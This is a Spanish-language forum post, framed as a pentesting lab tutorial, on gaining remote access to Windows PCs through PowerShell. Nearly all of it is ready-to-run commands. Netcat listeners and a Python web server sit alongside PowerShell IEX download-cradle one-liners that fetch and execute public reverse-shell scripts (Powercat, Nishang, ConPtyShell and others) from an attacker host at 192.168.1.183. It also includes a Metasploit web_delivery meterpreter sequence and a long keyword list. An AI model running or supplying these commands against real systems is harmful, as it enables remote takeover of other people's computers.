HACKERS usan POWERSHELL para ACCEDER a tu PC | Seguridad Informática

Avatar de Usuario
admin
Verified
Site Admin
Mensajes: 2088
Registered for: 9 years 10 months
9
Ubicación: Ciudad de Córdoba - Argentina
Gender:
Edad: 41
Contactar:

HACKERS usan POWERSHELL para ACCEDER a tu PC | Seguridad Informática

#1

Mensaje por admin »

Se explicara ejercicios de PENTESTING de como obtener ACCESOS REMOTOS usando scripts de POWERSHELL en la plataforma de WINDOWS

Imagen
 
LABORATORIO DE PRUEBA

Imagen
 COMANDOS

Código: Seleccionar todo

Powercat

nc -nvlp 4444

wget https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1

sudo python -m http.server 80

powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.1.183/powercat.ps1');powercat -c 192.168.1.183 -p 4444 -e cmd"


--------------------------------------------------------------------

Invoke-PowerShellTcp (Nishang)


wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

sudo python -m http.server 80

nc -nvlp 4444

powershell iex (New-Object Net.WebClient).DownloadString('http://192.168.1.183/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.1.183 -Port 4444


--------------------------------------------------------------

ConptyShell

wget https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1

sudo python -m http.server 80

stty raw -echo; (stty size; cat) | nc -lvnp 4444


powershell iex (New-Object Net.WebClient).DownloadString('http://192.168.1.183/Invoke-ConPtyShell.ps1'); Invoke-ConPtyShell 192.168.1.183 4444




-------------------------------------------------------------------

mini-reverse.ps1

wget https://gist.githubusercontent.com/Serizao/6a63f35715a8219be6b97da3e51567e7/raw/f4283f758fb720c2fe263b8f7696b896c9984fcf/mini-reverse.ps1

cat mini-reverse.ps1

nano mini-reserve-ps1

sudo python -m http.server 80

nc -nvlp 4444

powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.183/mini-reverse.ps1')



--------------------------------------------------------------------------


PowerShell Reverse TCP

wget https://raw.githubusercontent.com/ivan-sincek/powershell-reverse-tcp/master/src/invoke_expression/prompt/powershell_reverse_tcp_prompt.ps1

cat powershell_reverse_tcp_prompt.ps1

nano powershell_reverse_tcp_prompt.ps1

sudo python -m http.server 80

nc -nvlp 4444

powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.183/powershell_reverse_tcp_prompt.ps1')



------------------------------------------------------------------------------

Web Delivery

use exploit/multi/script/web_delivery

show targets 

set target 2

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.1.183

set lport 4444

show options 

exploit


sessions 

sessions 1

sysinfo

shell
VIDEO TUTORIAL




Pentesting
Security Technologies
Nmap
Sistema operativo
Operating Systems
Instalación y configuración
Install and configure
ssh
Metasploit Framework
payload
Unauthenticated LAN Remote Code Execution
Reverse connection Shell
Telnet
networking
Handshake
backdoor
LAN | Local Area Network
CMD execution
Netcat Listener
Exploit Code
NC
NetCat
GitHub
Firewall
Pentest Lab Setup
Laboratorio de Trabajo
Security
Ethical Hacking Certification
Guide
OWASP ZAP
Debian
Red Hat
Terminal
python
blue team
proxy
WAF Web Application Firewall
red team
Windows
Bug
Filtros de Seguridad
Actualizar update parchear Operating System
mfsconsole
vulnerabilidades de seguridad
detección de intrusos
Penetration Testing
Networking
Linux
Ubuntu
MacOS
script
Hash
instalacion
install
Step-by-Step
Download bajar o bloquear ejecucion
database
apache
base de datos
Vulnerabilidades
CVE
Perl
SQL Injection Exploitation Explanation  
Burp suite
Command Injection
php
Bypass All Security
proxy
VULNERABILITIES
parrot
Apache Nginx
Routing
redes hogareñas
Server and Client in Python
Localhost
binaries
certificates
certificados
OSI Model Modelo
TCP/IP
VPN
metadatos kali linux
ciberseguridad
metadatos ciberseguridad
information systems security professional
how hackers hack into pc
ehtical hacking
cyber seguridad
proteger computadoras
kali linux 2.0
comptia security+
detección de intrusiones en la red
kali linux tutorial
hacking etico
ethical hacker
servidores
tutorial hackers
how hackers do it
linux
File Transfer Filter Bypass
cyber seguridad
como eliminar virus de mi pc,comptia security+
penetration tests,how hackers do it
information systems security professional
linux for ethical hackers
vulnerabilidades
como saber si me espian mi pc
detección de intrusiones en la red
limpiar virus de mi pc sin programas
como saber si mi laptop esta hackeada
servidores
capacitacion
PowerShell for Pentester
Powercat
Invoke-PowerShellTcp (Nishang)
ConPtyShell
Mini-reverse
PowerShell Reverse TCP
Web_delivery (Metasploit)




powershell file transfer,
reverse shell tutorial
copy files powershell,
computerscience
informationsecurity,
hackernews,
hackingtools
cybersecurityawareness
cyberattack
termux,
ransomware,
Ethical Hacker,
Penetration Tester,
Cybersecurity Consultant,
learn security,
unix,
OSINT,
oscp certification,
try hack me,hacking,
ctf for beginners,ehtical hacking,
cyber seguridad,security,tool,linux for ethical hackers,
capacitacion,educacion,How Hackers Do It,cyber security,Information Systems Security Professional,comandos,
commands,remote function,,lab,testing,servidor,como escalar privilegios en windows o linux

Enlace:
BBCode:
HTML:
Ocultar enlaces al mensaje
Mostrar enlaces al mensaje
Responder

Create an account or sign in to join the discussion

You need to be a member in order to post a reply

Create an account

Not a member? register to join our community
Members can start their own topics & subscribe to topics
It’s free and only takes a minute

Registrarse

Sign in

  • Temas similares
    Respuestas
    Vistas
    Último mensaje

Volver a “Redes/Networking”

¿Quién está conectado?

Usuarios navegando por este Foro: No hay usuarios registrados visitando el Foro y 3 invitados